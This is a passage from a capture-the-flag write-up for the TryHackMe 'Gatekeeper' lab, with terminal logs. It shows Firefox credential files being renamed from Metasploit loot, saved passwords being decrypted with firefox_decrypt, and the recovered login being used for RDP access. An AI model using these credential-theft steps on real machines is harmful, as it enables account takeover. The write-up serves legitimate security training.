┌──(parallels㉿kali-linux-2022-2)-[~/.msf4/loot]
└─$ mv 20221219080535_default_10.10.180.246_ff.ljfn812a.key4_560537.bin key4.db       
                                                                                                                                                                                                                   
┌──(parallels㉿kali-linux-2022-2)-[~/.msf4/loot]
└─$ mv 20221219080536_default_10.10.180.246_ff.ljfn812a.logi_411220.bin logins.json
```

Then, we finally got new creds:
```bash
──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/gatekeeper/firefox_decrypt]
└─$ python firefox_decrypt.py /home/parallels/.msf4/loot
2022-12-19 08:14:45,467 - WARNING - profile.ini not found in /home/parallels/.msf4/loot
2022-12-19 08:14:45,467 - WARNING - Continuing and assuming '/home/parallels/.msf4/loot' is a profile location

Website:   https://creds.com
Username: 'mayor'
Password: '8CL7O1N78MdrCIsV'
```

We just have to authenticate ourselves on the machine with the recovered credentials and we got the flag !
```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/gatekeeper/firefox_decrypt]
└─$ xfreerdp /v:10.10.180.246 /u:"mayor" /p:"8CL7O1N78MdrCIsV" /drive:.,kali-share +clipboard
[08:16:12:456] [188811:188812] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[08:16:12:456] [188811:188812] [WARN][com.freerdp.crypto] - CN = gatekeeper
[08:16:12:456] [188811:188812] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[08:16:12:456] [188811:188812] [ERROR][com.freerdp.crypto] - @           WARNING: CERTIFICATE NAME MISMATCH!           @
[08:16:12:456] [188811:188812] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[08:16:12:456] [188811:188812] [ERROR][com.freerdp.crypto] - The hostname used for this connection (10.10.180.246:3389) 
[08:16:12:456] [188811:188812] [ERROR][com.freerdp.crypto] - does not match the name given in the certificate:
[08:16:12:456] [188811:188812] [ERROR][com.freerdp.crypto] - Common Name (CN):
[08:16:12:456] [188811:188812] [ERROR][com.freerdp.crypto] -    gatekeeper
[08:16:12:456] [188811:188812] [ERROR][com.freerdp.crypto] - A valid certificate for the wrong name should NOT be trusted!
Certificate details for 10.10.180.246:3389 (RDP-Server):
        Common Name: gatekeeper
        Subject:     CN = gatekeeper
        Issuer:      CN = gatekeeper
        Thumbprint:  5c:cb:11:44:51:62:6c:1b:97:43:e7:6a:3f:24:4a:07:35:28:e8:ce:8a:3c:cd:f5:d5:10:e6:d6:ed:a0:4f:79
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) Y
[08:16:15:911] [188811:188812] [INFO][com.freerdp.gdi] - Local framebuffer format  PIXEL_FORMAT_BGRX32
[08:16:15:911] [188811:188812] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[08:16:15:954] [188811:188812] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[08:16:15:954] [188811:188812] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[08:16:15:954] [188811:188838] [INFO][com.freerdp.channels.rdpdr.client] - Loading device service drive [kali-share] (static)
[08:16:16:531] [188811:188812] [INFO][com.freerdp.client.x11] - Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_BUMP_OPTIONS]
[08:16:53:814] [188811:188812] [INFO][com.freerdp.client.x11] - Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_SESSION_CONTINUE]
[08:16:54:696] [188811:188838] [INFO][com.freerdp.channels.rdpdr.client] - registered device #1: kali-share (type=8 id=1)
[08:17:25:823] [188811:188811] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]
```